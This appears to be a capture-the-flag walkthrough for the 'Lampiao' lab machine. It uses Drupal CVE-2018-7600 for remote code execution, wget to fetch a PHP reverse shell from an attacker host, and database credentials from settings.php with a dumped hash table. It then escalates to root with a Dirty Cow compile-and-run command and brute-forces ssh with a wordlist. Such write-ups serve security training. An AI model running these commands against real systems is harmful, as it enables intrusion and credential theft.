Lampiao¶
Netdiscover¶
192.168.1.141
Port scan¶
22/tcp open ssh syn-ack ttl 64 OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.7 (Ubuntu Linux; protocol 2.0)
80/tcp open tcpwrapped syn-ack ttl 64
1898/tcp open http syn-ack ttl 64 Apache httpd 2.4.7 ((Ubuntu))
Port 80¶
Port 1898¶
Robots.txt has interesting entry: Disallow/CHANGELOG.txt
Found an [exploit for drupal 7 < 7.57] (https://github.com/pimps/CVE-2018-7600)
RCE via CVE-2018-7600¶
./drupa7-CVE-2018-7600.py -c whoami http://lampiano:1898/
Reverse php webshell¶
copy the binary to your working folder
cp /usr/share/webshells/php/php-reverse-shell.php .
Remove the comments and change IP/port
host file on webserver
python3 -m http.server 82
Download to victim
./drupa7-CVE-2018-7600.py -c 'wget http://192.168.1.112:88/php-reverse-shell.php' http://lampiano:1898/
Activate the shell by visiting the webpage
http://lampiano:1898/shell.php
Fix the shell
python3 -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm
linPEAS findings¶
Found DB creds in /var/www/html/sites/default/settings.php
Get on the SQL db
mysql -u drupaluser -pVirgulino
Dump the users table
+-------+---------------------------------------------------------+
| name | pass |
+-------+---------------------------------------------------------+
| | |
| tiago | $S$DNZ5o1k/NY7SUgtJvjPqNl40kHKwn4yXy2eroEnOAlpmT0TJ9Sx8 |
| Eder | $S$Dv5orvhi7okjmViImnVPmVgfwJ2U..PNK4E9IT/k7Lqz9GZRb7tY |
| admin | $S$DQRp/JT8KnSM8cFRgzOlKL83DnHt6yxXieQ5hcq3me2bYeiA5p8A |
+-------+---------------------------------------------------------+
Tried cracking the hashes to no aval. Drupal 7 hashes take forever to crack, so I had plenty of time to think. PASSWORD REUSE. I should have immediately tried to su with the db password.
At this point we can drop the webshell and switch to ssh if desired.
Linpeas findings¶
Linux Exploit Suggester picked up Dirty Cow 2 as a possible exploit.
searchsploit -m 40839
Compile & run on victim
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil && ./dcow -s
Root Flag¶
Additional Exploitation methods¶
Able to break into tiago by scraping a detailed post and feeding all the words as a password through ssh. It only takes about 7 seconds to find the correct password this way.
